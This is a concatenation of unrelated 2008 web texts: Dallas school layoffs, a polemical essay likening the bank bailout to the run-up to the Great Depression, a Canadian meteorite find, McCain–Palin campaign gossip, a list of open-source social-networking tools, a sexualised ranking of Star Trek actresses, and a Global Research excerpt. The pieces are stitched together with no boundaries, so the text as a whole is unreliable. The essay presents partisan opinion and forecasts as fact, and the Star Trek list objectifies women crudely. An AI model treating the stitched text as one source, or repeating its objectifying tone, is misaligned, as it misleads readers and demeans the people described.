" My kids are going to lose out because I 'm a very good teacher , and so they 're going to lose out because they wo n't have me , " a tearful Sandy Keaton , a second - grade teacher at San Jacinto Elementary , told WFAA .
Watch teacher 's tearful lament »
The 375 teachers represent about 3 percent of the district 's more than 11,500 teachers .
Last week , 152 employees -- including clerks , office managers and teacher assistants -- voluntarily left their jobs , the district said .
On September 29 , 62 central staff members lost their jobs .
Voluntarily resignations and transfers spared 88 jobs , WFAA reported .
The district estimates that the job cuts and unfilled vacancies will save $ 30 million .
An additional $ 38 million will be saved by cutting various programs throughout the district .
The Dallas Independent School District is the nation 's 12th largest , with more than 160,000 students .
" The children are going to suffer , " Karina Colon , a prekindergarten bilingual teacher at San Jacinto Elementary , told The Dallas Morning News .
Colon kept her job , but was crying for her colleagues .
" I should feel happy , " she said .
The Dallas Independent School District will hold a job fair Tuesday for all employees who were given notice .
More than 110 employers will attend the fair , which was put together by the district , the United Way and the Dallas Regional Chamber .
All About Dallas • Education • Education Issues
“ Gentlemen , I have had men watching you for a long time , and I am convinced that you have used the funds of the bank to speculate in the breadstuffs of the country .
When you won , you divided the profits amongst you , and when you lost , you charged it to the bank .
You tell me that if I take the deposits from the bank and annul its charter , I shall ruin ten thousand families .
That may be true , gentlemen , but that is your sin !
Should I let you go on , you will ruin fifty thousand families , and that would be my sin !
You are a den of vipers and thieves .
I intend to rout you out , and by the eternal God , I will rout you out . ”
President Andrew Jackson 1832
Contrast the words of President Andrew Jackson who had a strong moral compass and a firm grasp of right and wrong to the words of our current President , George W. Bush .
“ The bipartisan economic rescue plan addresses the root cause of the financial crisis — the assets related to home mortgages that have lost value during the housing decline .
Under the Emergency Economic Stabilization
Act , the federal government will be authorized to purchase these assets from banks and other financial institutions , which will help free them to resume lending to businesses and consumers .
I know many Americans are worried about the cost of the bill , and I understand their concern .
This bill commits up to 700 billion taxpayer dollars , because a large amount of money is necessary to have an impact on our financial system .
However , both the non-partisan Congressional Budget Office and the Office of Management and Budget expect that the ultimate cost to the taxpayer will be far less than that .
In fact , we expect that over time , much — if not all — of the tax dollars we invest will be paid back . ”
Mr. Bush fails to realize that the root cause of the financial crisis is not the housing decline .
The root cause is the greed of Wall Street CEOs , including his current Treasury Secretary , the failure of government to enforce existing rules to protect consumers and the greed and recklessness of Main Street USA as they attempted to borrow their way to prosperity .
In the classic Washington fashion , the banker bailout bill was repackaged by Washington PR maggots into the Main Street Rescue bill .
This is what constitutes progress in Washington .
A three page fascist - like bill proposed by Hank Paulson grew to a 450 page goliath pork laden bill in less than one week .
The bill that passed bought off every constituent in the U.S. with pork for rum producers , toy arrow makers , and film producers , while adding an additional $ 120 billion to the national debt .
President Bush signed the bill before the ink was dry .
The market immediately proceeded to decline 450 points in minutes , declaring that it will not work .
Not to worry .
Another bailout bill will be on its way shortly .
President Jackson was at war with the bankers who had taken undue risks and caused much pain in the country .
He was willing to allow short term pain on American families , rather than let these bankers inflict much more damage in the future .
President Bush and his cohorts at the Federal Reserve & Treasury have attempted to reverse the natural capitalist cycle of boom and bust during his entire eight year administration .
The reduction of interest rates to 1 % , tax rebates , excessive deregulation , and encouragement by the President and Federal Reserve to speculate and spend have led to our financial crisis today .
A President with a backbone and moral compass would be telling the American people that our bankers have ruined this country and have caused the coming deep recession .
He would explain that it is a painful lesson that must be faced now so that future generations would not have to pay for the sins of today .
Instead , he urged the American people to support a $ 820 billion banker bailout which will attempt to push off pain far into the future .
He has clearly failed the test of leadership and does n't deserve to be in the same company as “ Old Hickory ” .
In the last few weeks I 've heard a lot of discussion about the Great Depression .
Jim Cramer has said that if the bailout was n't passed , we would experience a 2nd Great Depression .
This has led me to try and assess the circumstances which existed prior to the Great Depression of the 1930 's versus the conditions today .
The most recent flow of funds data shows that total credit market debt is $ 51 trillion versus our $ 14.3 trillion GDP .
Debt as a percentage of GDP is now 356 % versus 260 % during the Great Depression of the 1930's .
This massive buildup of leverage has just begun to unwind .
If this is just the beginning of the great leverage unwind , then the pain will be tremendous when it really gets going .
The conclusion that I reach when looking at the vertical takeoff of debt in the early 1980's is that this country has been living a lie of false prosperity .
The huge McMansions , luxury cars , high tech gadgets , granite kitchens , 2nd homes , and exotic vacations were purchased with debt .
These “ assets ” are depreciating rapidly and consumers and companies are desperately selling assets to pay down the debt that is strangling them .
The psychology of this country has begun to change from conspicuous consumption to forced liquidation and saving .
The psychology of the country has taken longer to get to this point than I thought it would .
Real median household income in the U.S. is $ 50,233 today .
It was $ 50,577 in 2000 when George Bush took office .
The government has added over $ 4 trillion to the national debt during this time .
This proves that most people in this country have not been able to generate enough income to keep up with inflation .
And this is using the fake CPI numbers put out by the government .
Using inflation rates in the real world would make the situation more dire for the average household .
The only way people have been able to maintain their lifestyle has been to borrow against their house and run up their credit cards .
That is a phony improvement in lifestyle .
The country has been living a lie for the last twenty years .
It is now time to pay the piper .
Even more disturbing is the fact that the top 20 % of households showed real increases in income .
The bottom 50 % lost income during the Bush years , with the bottom 20 % losing 6 % of income over this time frame .
No wonder there is so much anger in the country regarding this bailout for the top 1 % .
Fifty million households make less today than they made 8 years ago .
The criminal CEOs on Wall Street collected $ 30 million annual salaries while their companies have lost $ 500 billion in the last year .
The average American is living paycheck to paycheck and can't maintain a lifestyle without borrowing .
The unwinding of this unbelievable debt load could lead to the next Great Depression .
Coming Depression ?
There is no absolute consensus regarding the causes of the Great Depression , but some common themes become clear .
I will try to evaluate today 's environment versus the conditions that existed in the 1920's .
Expansion of the money supply by the Federal Reserve during the 1920's
According to the Austrian School of economics , the Great Depression was mainly caused by the expansion of the money supply by the Federal Reserve in the 1920's that led to an unsustainable credit driven boom .
Both Friedrich Hayek and Ludwig von Mises predicted an economic collapse in early 1929 .
In the Austrian view it was this inflation of the money supply that led to an unsustainable boom in both asset prices ( stocks and bonds ) and capital goods .
Ben Strong , the head of the Federal Reserve , attempted to help Britain by keeping interest rates low and the USD weak versus the Pound .
The artificially low interest rates led to over investment in textiles , farming and autos .
In 1927 he lowered rates yet again leading to a speculative frenzy leading up to the Great Crash .
By the time the Federal Reserve belatedly tightened in 1929 , it was far too late and , in the Austrian view , a depression was inevitable .
The artificial interference in the economy was a disaster prior to the Depression , and government efforts to prop up the economy after the crash of 1929 only made things worse .
According to Murray Rothbard , government intervention delayed the market 's adjustment and made the road to complete recovery more difficult .
Alan Greenspan reduced interest rates to 1 % for over a year in 2003 .
This act led to a speculative frenzy in real estate , $ 3 trillion of equity withdrawal by consumers and tremendous overconsumption built upon a foundation of debt .
This speculative frenzy was exacerbated by the “ Masters of the Universe ” on Wall Street with their CDOs , MBSs , and other magic potions that made bad loans appear good .
The Bush administration 's decision to not enforce any existing oversight of the banks also contributed greatly to the current situation .
Realistically , the current conditions are worse than they were prior to the Great Depression based on the speculation that has occurred in the last eight years in stocks and real estate .
Debt as a percentage of GDP is now 356 % versus 260 % prior to the Crash of 1929 .
Excessive use of debt which led to a false prosperity
According to author Jeffrey Kaplan , consumerism took hold of America during the 1920's .
“ By the late 1920s , America 's business and political elite had found a way to defuse the dual threat of stagnating economic growth and a radicalized working class in what one industrial consultant called “ the gospel of consumption ” – the notion that people could be convinced that however much they have , it is n't enough .
President Herbert Hoover 's 1929 Committee on Recent Economic Changes observed in glowing terms the results : “ By advertising and other promotional devices . . . a measurable pull on production has been created which releases capital otherwise tied up . ”
They celebrated the conceptual breakthrough : “ Economically we have a boundless field before us ; that there are new wants which will make way endlessly for newer wants , as fast as they are satisfied . ”
By 1929 , the richest 1 % owned 40 % of the nation 's wealth .
The top 5 % earned 33 % of the income in the country .
The bottom 93 % experienced a 4 % drop in real disposable income between 1923 and 1929 .
The middle class comprised only 20 % of all Americans .
Society was skewed heavily towards the haves .
By 1929 , more than half of all Americans were living below a minimum subsistence level .
Those with means were taking advantage of low interest rates by using margin to invest in stocks .
The margin requirement was only 10 % , so you could buy $ 10,000 worth of stock for $ 1,000 and borrow the rest .
With artificially low interest rates and a booming economy , companies extrapolated the good times and invested in huge expansions .
During the 1920s there were 1,200 mergers that swallowed up more than 6,000 companies .
By 1929 , only 200 mega - corporations controlled over half of all American industry .
There are some disturbing parallels between what was happening during the 1920s and what has been happening in America in the last 10 years .
Today , the richest 1 % own 21 % of the nation 's wealth .
The bottom 50 % has experienced a 4 % drop in real disposable income in the last eight years .
During the dot.com boom of 1998 ?
2000 , small investors used massive amounts of margin debt to speculate in companies with no earnings .
When this bubble collapsed , a lesson should have been learned that would last a lifetime .
Instead , Alan Greenspan lowered interest rates to 1 % and encouraged everyone to take out an Adjustable Rate Mortgage .
The speculation in real estate reached phenomenal heights by 2005 .
The downside of that speculation is now only half finished .
Stabilization of house prices is at least another year away and another 20 % to the downside .
That would still leave prices high on a historical basis .
Home prices did not fall on a national level during the Great Depression .
In the last ten years , there have been hundreds of mergers , particularly in the financial industry .
The repeal of the Glass - Steagall Act in 1999 , spearheaded by Senator Phil Gramm , allowed the massive consolidation in the industry .
This is why our financial institutions have become too big to fail and are on the brink of collapsing the world economy .
Excess speculation by a small group of wealthy investors
The administrations of Warren Harding and Calvin Coolidge are considered the most corrupt in American history .
Coolidge 's administration was committed to laissez - faire non-regulation government .
He announced to all Americans , “ The business of America is business . ”
The top tax rate was lowered to 25 % in 1925 , the lowest top tax rate in any decade since .
Exports boomed due to the low value of the Dollar versus the British Pound .
The ruling elite of society were the Wall Street speculators .
Only 1.5 million people out of an entire population of 120 million invested in the stock market .
Ben Strong , attempting to help Britain , reduced rates in 1927 .
This ignited a speculative frenzy in 1928 and 1929 .
Margin loans increased from $ 3.5 billion in 1927 to $ 8.5 billion in 1929 .
Stock prices rose 40 % between May 1928 and September 1929 , while daily trading rose from 2 million shares to 5 million shares per day .
The market reached a peak of 381 , with a PE ratio of 23 based on normalized earnings , on September 3 , 1929 .
Ben Strong died in October 1928 .
Therefore , he did not witness the terrible pain inflicted upon Americans by his reckless policies .
Alan Greenspan has not been so fortunate .
He is able to witness how his reckless interest rate reductions have resulted in a worldwide financial collapse .
He continues to defend his actions , but his legacy will forever be linked to this disaster .
These low rates caused a speculative frenzy in stocks and then housing .
The Bush administration 's belief in allowing free markets to regulate themselves led financial institutions to take ridiculous risks using massive amounts of debt .
Despite two ongoing wars and growing budget deficits , the Bush administration decreased taxes on the wealthy .
The dollar declined dramatically in the last eight years , resulting in increased exports .
The PE ratio of the market reached an astronomical 38 in 2000 , before crashing below 20 by 2003 .
Currently , the PE ratio of 25 exceeds the level at the peak prior to the Crash in 1929 .
The stock market declined to 41 by 1932 , an 89 % decline in three years .
The PE ratio of the market declined to below 5 by the mid 1930's .
The market did not return to its 1929 level until 25 years later , in 1954 .
As the market began to fall , prominent Wall Street CEOs did their best to prop up the market .
Charles Mitchell of National City Bank on October 21 , 1929 , a few short days before the crash , said , “ I know nothing fundamentally wrong with the stock market . ”
George Harrison , the new Federal Reserve Chairman , provided tremendous amounts of credit to the banking system in 1929 and early 1930 , attempting to keep the party going .
In the last few months , how many times have we heard Hank Paulson , John Thain , and other Wall Street cheerleaders tell us the banking system is safe and sound ?
Ben Bernanke has reduced interest rates dramatically , pumped money into the banking system , and taken bad assets onto the Fed balance sheet .
So far , this does not appear to be working .
The market has declined 30 % from the peak , but is overvalued on a historical basis with profits about to plunge during the coming downturn .
Government responding with tighter credit , higher taxes and higher tariffs
Ben Bernanke , a self proclaimed expert on the Great Depression , concluded that missteps by the Federal Reserve in 1930 and 1931 resulted in the financial crisis becoming a depression .
After the stock market crashed , speculators began selling dollars for gold in 1931 .
This caused the value of the dollar to plummet .
The Federal Reserve raised rates and reduced the money supply by 30 % to try and prop up the dollar .
Investors began to withdraw their dollars from banks , and banks began to fail .
By the end of 1932 , 9,000 banks failed .
People hid their cash under their mattresses .
Bank deposits were uninsured , so when banks failed , people lost their life savings and businesses failed .
Panic and fear gripped the nation .
The remaining banks hoarded their cash , refusing to make loans to businesses .
Treasury Secretary Andrew Mellon declared , “ Liquidate labor , liquidate stocks , liquidate real estate , values will be adjusted , and enterprising people will pick up the wreck from less competent people . ”
The failure to stimulate the economy with increases in the money supply was a huge mistake .
The United States had the flexibility to stimulate the economy .
At that point in history the U.S. was the biggest creditor in the world , with a trade surplus of $ 638 million .
Instead of stimulating the money supply , the government attempted to protect American businesses by passing the Smoot - Hawley Tariff in June 1930 .
This bill increased taxes on imports which led to retaliation by other countries and contributed greatly to the worldwide downturn .
World trade declined 67 % by 1933 .
Herbert Hoover increased the top tax rate from 25 % to 63 % in 1932 .
All of these government missteps led to a downward spiral in the economy .
In 1930 the GNP declined 9.4 % and unemployment rose from 3.2 % to 8.7 % .
In 1931 the GNP declined a further 8.5 % and unemployment surged to 15.9 % .
The worst year of the Depression was reached in 1932 with GNP declining 13.4 % and unemployment reaching 23.6 % .
After the election of Franklin Roosevelt in 1932 , his New Deal programs made people in the country feel like progress was being made , but unemployment remained above 14 % throughout the 1930s .
Roosevelt 's plans to redistribute wealth from the rich to the poor prompted millionaire businessmen Du Pont and J.P. Morgan to plan an overthrow of Roosevelt by military coup and installation of a fascist government .
They tried to convince General Smedley Butler that they would provide an army of 500,000 and unlimited funding .
The plot was foiled when the general reported it to Congress .
Desperate times sometimes lead to desperate measures .
The Depression did not truly end until 1939 when the U.S. borrowed $ 1 billion to begin rearmament in preparation for war .
Thus far , in this current financial crisis no one can accuse the Federal Reserve or the Administration of not responding with injecting liquidity into the system or reducing interest rates sufficiently .
The discount rate has been reduced from 4.75 % to 2 % in the past year .
The Federal Reserve has increased their balance sheet by over $ 1 trillion in the last 9 months .
The government has committed in excess of $ 1.3 trillion of taxpayer money to keep the financial system from imploding .
The question that has yet to be answered is whether these actions are just pushing on a string .
Are the current conditions so extreme that we are destined for a severe recession or possible depression ?
The country has a national debt of $ 9.6 trillion , annual deficits of $ 600 billion , unfunded future liabilities of $ 53 trillion , a trade deficit of $ 600 billion , inflation of 6 % , two wars costing $ 12 billion per month , and a weak currency .
Therefore , we have not entered this extremely dangerous period with strong economic fundamentals .
In the last few years Congress has become much more protectionist .
The sale of U.S. ports to an Abu Dabai company was blocked .
The acquisition of a U.S. oil company by a Chinese oil company was also blocked .
Worldwide trade negotiations recently broke down with no agreement .
Free trade is being threatened .
In 4 weeks the country will likely elect Barrick Obama President and Congress will be overwhelmingly in the hands of the Democratic Party .
Mr. Obama has made it clear that he will increase taxes on those earning more than $ 250,000 and corporations .
His plans include health coverage for all Americans and major spending initiatives on education and infrastructure .
With colossal deficits , a protectionist Congress , tax increases coming , and gigantic spending initiatives , the next four years are setting up to be exceptionally difficult for the U.S. economy .
The parallels to the early 1930s are eerie .
The next administration could easily make policy mistakes which would cause a 2nd Great Depression .
Boundless Morass of Uncertainty
The $ 820 billion bailout package will not fix what is wrong with this country .
Hank Paulson will buy bad assets from any financial institution in the entire world for some yet to be determined price .
Many smart people , including John Hussman , Nouriel Roubini , and Chris Whalen have concluded that the plan will not work .
The banks need a direct infusion of capital to begin their recovery process .
This entire exercise in futility will be overwhelmed by events in a matter of days .
The American taxpayer will never see a dime of that $ 820 billion paid back .
When was the last time a government program actually worked ?
Corrupt politicians , Washington bureaucrats , Wall Street fat cats , and clueless commentators have failed to realize that the gig is up .
Our entire financial system has been built upon deception , lies and debt .
The only thing keeping the system afloat has been blind faith in our government and financial leaders to do the right thing .
The whole world now has seen that these leaders were lying and the blind trust has been shattered into a billion pieces .
There is currently a worldwide run on the banking system .
The pictures from the Great Depression show people standing in line to get their cash out of the banks .
We are in a different age that allows bank runs to occur in seconds rather than days .
Companies and wealthy people in the know are pressing buttons and transferring billions in cash out of dangerous shaky financial institutions .
With leverage of 30 or 40 times their cash balances , banks are collapsing around the globe .
The average American does not see this happening and is being kept in the dark by the all powerful lords of finance .
The market hailed the investment by Warren Buffett last week in General Electric .
Of course , no one from CNBC would ask why GE would sell stock at a 10 year low price after buying back billions when the stock was in the $ 30's , pay 10 % interest to Mr. Buffett when market rates are 4 % , and stop dividend increases after decades of increases .
GE is in much worse shape than anyone is willing to admit .
Governments throughout the world are desperately trying to stem the tide of defaults , but confidence in the Ponzi scheme has been destroyed .
Behind the scenes , Ben Bernanke and Hank Paulson are scrambling to provide enough liquidity to keep the system from imploding .
A worldwide coordinated , reduction in interest rates will occur soon as a last ditch effort .
For the 1st time in many years I saw something that shows promise for our country 's future .
Despite the rhetoric from President Bush , Hank Paulson , Ben Bernanke , Nancy Pelosi , Barney Frank , all CNBC commentators , and various ultra-rich Wall Street shills , the American public was firmly against this bailout bill .
I sense that the “ ME GENERATION ” is finally ready to accept the consequences of their selfish lifestyle over the last 30 years .
The materialistic frenzy that has been the hallmark of the Baby Boom Generation is coming to an end .
It is being forced upon many , but will be the choice of many more .
The worldwide deleveraging will lead to a new mantra for this generation , frugality and living beneath your means .
The psychology of the whole world has changed in a fortnight .
Our leaders are so consumed by their own agendas that they have not realized the implications of this psychological change .
Chaos and turmoil reign in the markets today .
The population of the U.S. will turn inward and seek comfort in more simple pursuits .
This will ultimately be a beneficial change for our society .
But , the immediate result will be wrenching for the country .
The Catch - 22 of our current economic system is that if everyone in the country lives within their means , the economy will collapse .
The spending of money we do not have is what has driven our “ Great ” country for the last three decades .
We can always count on Government to not live within its means , so deficit spending will continue and most likely accelerate .
But , consumers have been dependent upon the stupidity and recklessness of banks , credit card companies , retailers , and auto makers to help them live above their means .
This part of the American Dream is lying in shambles .
Banks will not lend , credit card companies are cancelling credit lines , retailers are closing stores , and auto makers have stopped financing cars .
Part 2 of our economic crisis has just begun .
Having worked for a big box retailer and a major public homebuilder , I have witnessed first hand that faulty pie in the sky assumptions about growth will lead to dreadful strategic decisions that have huge negative financial consequences to those companies .
The coming Holiday season will be the worst for retail in decades .
Most retailers generate 50 % to 75 % of their profits in November and December .
Early in 2009 , the avalanche of retail bankruptcies will begin .
The big box retailers who built their expansion plans upon demand that was a debt induced fallacy , will experience tremendous losses .
They will begin to close stores by 2010 .
Automakers will continue to see sales decline to levels never thought imaginable .
All three major U.S. automakers could go bankrupt by 2010 .
House prices will continue downward .
Two or three major homebuilders will go bankrupt by 2010 , while hundreds of small builders will collapse .
Mall developers and commercial developers have taken on billions in debt in the last decade .
As tenants go bankrupt and the rents dry up , hundreds of large public developers will declare bankruptcy .
These losses are not factored into the numbers of the 8,500 banks in the U.S.
By the time this crisis is finished , we are likely to be left with 5,000 banks or less .
The official unemployment rate will easily surpass 7 % and possibly reach 8 % by 2010 .
Based on the unemployment calculation used during the time of the Great Depression , we already have unemployment of 15 % .
This could conceivably reach 20 % .
The PE of the market is still above 20 .
Profits will plunge in 2009 and irrational pessimism could propel the Dow to its 2002 low of 7,200 .
That would be 28 % below today 's levels and almost 50 % below the all time high of 14,000 .
Even if we somehow avoid a true depression , the next few years will be extremely painful .
The question is whether we come out the other side as a stronger Nation or a weaker declining Nation .
The words of Congressman Ron Paul should be the rallying cry for our great country .
“ The issue boils down to this : do we care about freedom ?
Do we care about responsibility and accountability ?
Do we care that our government and media have been bought and paid for ?
Do we care that average Americans are being looted in order to subsidize the fattest of cats on Wall Street and in government ?
Do we care ?
When the chips are down , will we stand up and fight , even if it means standing up against every stripe of fashionable opinion in politics and the media ?
Times like these have a way of telling us what kind of a people we are , and what kind of country we shall be . ”
It is time for our citizens to accept the bitter medicine of bad times , but to learn from our mistakes and put this great nation back on course as the beacon of democracy that our Founding Fathers envisioned .
If you care about the future of America join me at [ link edited for length ]
[ / caption ]
On Nov. 27 , planetary scientist Dr. Alan Hildebrand from the University of Calgary and graduate student Ellen Milley brought reporters to a site where they have found numerous meteorite fragments from the bolide that streaked across the sky in Western Canada on Nov. 20 .
The area where the meteroite fragments were found is called Buzzard Coulee , about 40 kilometers from the town of Lloydminster , on the Alberta - Saskatchewan border .
There , around a frozen pond , numerous small rocks and pebbles could be seen that the scientists said were from the meteorite .
No large chunks were spotted , however , reporters said .
The fireball that streaked across western Canadian skies was witnessed by thousands , and Hildebrand believes it was a 10 - ton fragment from an asteroid .
Videos from surveillance and police cameras showed the meteor exploding before it hit the ground .
Reporters were told those observations , combined with the physical evidence , give scientists a treasure trove of data that could give them a better understanding of the solar system .
The reports do n’t offer any indications of the type of meteorite the fragments are , but from the images they appear to possibly be iron .
We ’ll add more images and information as they become available .
Sources : CBC.com ,
, Washington Post , Phys.
Org
Not awkward at all .
Last Thursday we sensed some strife in the wind , buoyed by stories of $ 150,000 wardrobes and “ lack of chemistry . ”
Get ready , we said , because as the McCain campaign begins to stumble toward the finish line , you ’re going to start reading all sorts of stories about how John McCain and Sarah Palin are seriously butting heads .
The very next day , the reports started hitting newsstands and the Internet , resulting in a weekend devoted to documenting every little bit of gristle in the tough , maverick -y meat of the Republican ticket .
Turns out Palin is reportedly chafing against the former Bush aides tasked to manage her , and has added a constitutional amendment against gay marriage and campaign “ robocalls ” to the list of topics on which she publicly disagrees with McCain .
Here are some of the best bits :
• “ There ’s a faction within the McCain campaign has begun to whisper about Gov. Sarah Palin to reporters .
The faction includes staff members and advisers who consult with staff members .
It does not seem to include any members of the senior staff , although the definition of the senior staff here is a bit elastic .
This faction has come to believe that Palin , perhaps unwittingly , subconsciously or otherwise , has begun to play Sen.
McCain off of the base , consistently and deliberately departed from the campaign ’s message of the day in ways that damage McCain . ” [ Atlantic ]
• “ ‘ She ’s lost confidence in most of the people on the plane , ’ said a senior Republican who speaks to Palin , referring to her campaign jet .
He said Palin had begun to ‘ go rogue ’ in some of her public pronouncements and decisions .
‘ I think she ’d like to go more rogue , ’ he said … ‘ These people are going to try and shred her after the campaign to divert blame from themselves , ’ a McCain insider said , referring to McCain ’s chief strategist , Steve Schmidt , and to Nicolle Wallace , a former Bush aide who has taken a lead role in Palin ’s campaign .
Palin ’s partisans blame Wallace , in particular , for Palin ’s avoiding of the media for days and then giving a high - stakes interview to CBS News ’ Katie Couric , the sometimes painful content of which the campaign allowed to be parceled out over a week . ” [ Politico ]
• “ Things have gotten so tense between Palin and her traveling staff , an insider said , that she ’s overruling their advice — which was evident last week when she ignored GOP aides piling into waiting cars at a Colorado event and strolled over to the press corps for an impromptu talk . ” [ NYP ]
• Despite the McCain campaign ’s wishes , Palin made an impromptu announcement on NBC Nightly News last week that that they should release her medical records .
Today it was learned that they ’ll do this in the next couple of days .
[ ABC News ]
• “ ‘ She is a diva .
She takes no advice from anyone , ’ said [ a ] McCain adviser .
“ She does not have any relationships of trust with any of us , her family or anyone else .
Also , she is playing for her own future and sees herself as the next leader of the party .
Remember : Divas trust only unto themselves , as they see themselves as the beginning and end of all wisdom . ” [ CNN ]
• At a Tampa rally yesterday , Palin blasted the RNC for buying her a $ 150,000 wardrobe , calling it “ ridiculous . ”
Unsurprisingly , these were not the remarks that were sent to her in the morning by the McCain campaign .
[ UPI ]
Related : Coming Soon : Stories on How Sarah Palin and John McCain Hate Each Other [ NYM ]
Sarah Palin , 2012 [ NYM ]
Palin ’s Favorite Consignment Shop in Trouble [ NYM ]
Nate Silver and Jonathan Chait on Early Voting and the Latest Sarah Palin Rumor [ NYM ]
Six Great Underdog Movies John McCain Should Probably Watch [ NYM ]
By admin on Oct 18 , 2008 in open source
Here are some open source social networking software that you can use to set up your social networking website ,
Mahara is an open source e-portfolio , weblog , resume builder and social networking system , connecting users and creating online learner communities .
Mahara is designed to provide users with the tools to demonstrate their life - long learning , skills and development over time to selected audiences .
Elgg is an open , flexible social networking engine , designed to run at the heart of any socially - aware application .
Building on Elgg is easy , and because the engine handles common web application and social functionality for you , you can concentrate on developing your idea .
Built with Ruby on Rails , Lovd is a social networking solution that has everything you need to build your community .
Using AROUNDMe collaboration server you can create multiple collaborative group , webspace , community or social networking websites .
Each group can create a multiple page collaborative web site .
They get social tools such as a guestbook ( a wall ) , a group blog , a forum and a wiki which they can drop into web pages .
Each group is fully customisable using xHTML , CSS , Javascript and PHP .
Groups can be private or public .
People can connect to a group to contribute using OpenID .
They get tracking tools such as forum digest and blog RSS feeds .
XOOPS is an extensible , OO ( Object Oriented ) , easy to use dynamic web content management system written in PHP .
Yogurt is a social network module for ImpressCMS , Xoops .
Dolphin Smart Community Builder is a universal , free , open source software that allows you to build any kind of online community .
With a huge variety of features & options , you can quickly develop your very unique and successful website .
PHPizabi is another social networking software in PHP .
Insoshi is a product and a project .
The product aims to be the best open - source social networking platform .
The project is to make the product !
They are the babes we ’d all like to boldly go with – the hottest women to ever appear in Star Trek .
But compiling a list of the sexiest ever was never going to be easy .
With all its different incarnations and the sheer volume of life - forms Captain Kirk alone has sullied , it ’s certainly a tough job .
But Hecklerspray has never been one to shirk a challenge and is prepared to risk the wrath of Trekkies across the world by compiling a list of lovelies that are the envy of the galaxy .
And we are pretty happy with the results .
Put it this way , we ’d certainly love to get our hands on their tricorders .
However , we are sure you will have your own suggestions .
As always , please let us know of any glaring omissions – not that you need any encouragement , you pedantic , miserable bastards .
And before you ask , we have not included the upcoming Star Trek film , which is due to be released next year .
So the names Zoe Saldana and Jennifer Morrison have not been added to the list this time , but would certainly come into contention next time if we decided to do this list again .
Anyway , set your phasers to stun and enjoy .
26 . Tasha Yar ( Denise Michelle Crosby )
Next Generation
A personal favourite , but , sadly , the frankly blokeish haircut bumped our dear Tasha down the list .
25 . Marta ( Yvonne Craig )
Original series
Batgirl as a green - skinned slave girl – what ’s not to like ?
24 . Dr Helen Noel ( Marianna Hill )
Original Series
Love her bedside manner .
23 . Droxine ( Diana Ewing )
Original Series
One of the most elegant actresses to pass through the series .
22 . Nona ( Nancy Kovack )
Original Series
Played a Kanutu medicine woman in A Private Little War , but is possible more famous for her role as Medea in Jason And The Argonauts .
21 . Lt. Saavik ( Kirstie Alley )
Star Trek 2 : Wrath of Khan
Yeah , we know , but there is little doubt she was a fine - looking woman in her early years .
20 . Tonia Barrows ( Emily Banks )
Original series
Received the benefit of Doctor McCoy ‘s bedside manner .
19 . Nyota Uhura ( Nichelle Nichols )
Original series
No Star Trek list would be complete without her .
A true legend .
18 . Kelinda ( Barbara Bouchet )
Original Series
Played Kelinda in the original series , but is possibly more famous for playing Miss Moneypenny in the 60s spoof version of Casino Royale .
17 . Kara ( Marj Dusay )
Original series
Watch out for this temptress , a glorified zombie itching to steal your brain !
16 . Ensign Ro Laren ( Michelle Forbes )
Next Generation
A rebel , unliked by many , and ultimately a traitor .
Shame on you Ensign Ro , but how can we say no ?
15 . B’elanna Torres ( Roxann Dawson )
Voyager
Klingon ridges and her temper work against B’elanna , although we bet she ’s feisty in the bedroom .
14 . Beverly Crusher ( Gates Macfadden )
Next Generation
A redhead and MILF to boot .
What more could you ask for ?
13 . Ishara Yar ( Beth Toussaint )
Next Generation
Tasha ’s sister has the body of a champion whippet
12 . Yeoman Janice Rand ( Grace Lee Whitney )
Original Series
As Kirk says , she was “ too beautiful to ignore ” and “ too much woman ” .
We certainly agree Kirk .
11 . Deanna Troi ( Marina Sirtis )
Next Generation
England ’s very own Marina Sirtisis loved by fans for her voluptuous figure , skin tight bunny suit and the fact she ’d sleep with anyone or anything .
10 . Anij ( Donna Murphy )
Star Trek : Insurrection
A looker for her age ( over 300 years old ) .
If Picard did n’t have his eyes already set on Anij , you know you ’d want a piece of that action .
9. Ezri Dax ( Nicole de Boer )
Deep Space Nine
Essentially , Jadzia Dax version 2 , which ca n’t be all bad .
8. Android Andrea ( Sherry Jackson )
Original series
Kissing Kirk was not part of her programming .
What can we say , programmes are there to be hacked .
Better still that costume does n’t leave much to the imagination .
7. Ensign Robin Lefler ( Ashley Judd )
Next Generation
Ensign Lefler lives by her own rules , Sadly , one of them being # 22 : Never date a co-worker .
Too bad Wesley ( Crusher )
6. Kes ( Jennifer Lien )
Voyager
Youthful and Innocent , just about the cutest elf you ’ll find this side of the Delta Quadrant
5. Hoshi Sato ( Linda Park )
Enterprise
Sultry and smart , knowing over 40 languages is a good workout for the mouth if you catch our drift .
4. Jadzia Dax ( Terry Farrell )
Deep Space Nine
A very hot woman who attracted the attentions of Bashir and ultimately Worf .
Slight turn - off : her multiple personalities , call it what you will .
3. Kamala ( Famke Janssen )
Star Trek : Next Generation
Simply stunning and a real favourite at Hecklerspray Towers .
2. T’Pol ( Jolene Blalock )
Enterprise
A Trellium - D addict , which is great for lowering her inhibitions .
1. Seven of 9 ( Jeri Ryan )
Voyager
Seven of 9 ?
More like 10 out of 10 .
Honorable mentions :
Lieutenant Valeris ( Kim Cattrall )
Kira Nerys ( Nana Visitor )
Hungry for more ?
You might want to check out our ranking of the top celebrity nudes of all time .
NSFW warning , of course .
Prof. Rodrigue Tremblay
Global Research
October 13 , 2008
" The basis for optimism is sheer terror . " Oscar Wilde [ After the March 2008 Bear Stears bailout ]
" As more firms lost access to funding , the vicious circle of forced selling , increased volatility , and higher haircuts and margin calls that was already well advanced at the time would likely have intensified .
The broader economy could hardly have remained immune from such severe financial disruptions .
" Ben Bernanke , Fed Chairman ( March 2008 ) “ In accounting 101 we learn that high yields equal high risk .
We know the CEOs had an incentive to disregard this because they were getting huge bonuses . ”
David Hartzell , dean of the University of Delaware ’s business college and a former vice - president of Salomon Brothers
“ Intensifying solvency concerns about a number of the largest U.S. - based and European financial institutions have pushed the global financial system to the brink of systemic meltdown . ”
Dominique Strauss - Kahn , Head of the IMF ( October 11 , 2008 )
The Bush administration ’s way of dealing with the ongoing financial crisis has been frantic , but probably less than adequate .
In fact , tragic errors may have been made that must be remedied as quickly as possible .
The most damaging error may have been to let the global investment bank Lehman Brothers fail ( $ 691 billion of assets at the end of 2007 ) , on Monday September 15 .
This fateful date may have to be remembered in the future .
This was the largest failure of an investment bank since the collapse of Drexel Burnham Lambert in 1990 .
In contrast , the Fed and the U.S. Treasury moved quickly in mid-March ( 2008 ) to save a similar global investment bank in distress ( but half the size of Lehman ) , Bear Stearns , by quickly lending and guaranteeing $ 29 billion to the large universal J. P. Morgan Chase bank in order to absorb it .
